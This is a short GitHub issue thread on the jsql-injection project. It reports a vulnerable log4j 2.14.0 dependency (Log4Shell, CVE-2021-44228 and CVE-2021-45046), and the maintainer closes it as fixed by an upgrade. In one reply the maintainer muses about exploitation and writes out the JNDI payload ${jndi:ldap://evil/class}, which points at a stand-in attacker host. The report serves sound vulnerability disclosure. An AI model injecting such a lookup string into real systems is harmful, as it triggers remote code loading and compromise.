jsql-injection
jsql-injection copied to clipboard
Log4shell vulnerable
What's the expected behavior?
pom.xml is adjusted to pull the latest log4j version
What's the actual behavior?
pom.xml requires log4j v2.14.0 which is vulnerable against CVE-2021-44228 and CVE-2021-45046)
Any other detailed information about the Issue?
See https://www.techsolvency.com/story-so-far/cve-2021-44228-log4j-log4shell/
Steps to reproduce the problem
- inspect pom.xml regarding log4j version
I'm following this last Log4j CVE event too.
While there's no real attack surface in the present case to hijack jSQL users, I'm wondering how an exploitation would look like, maybe in logging database name or HTTP header that looks like ${jndi:ldap://evil/class} for a given honeypot.
Thanks for the report :+1:
Fixed by dependency upgrade.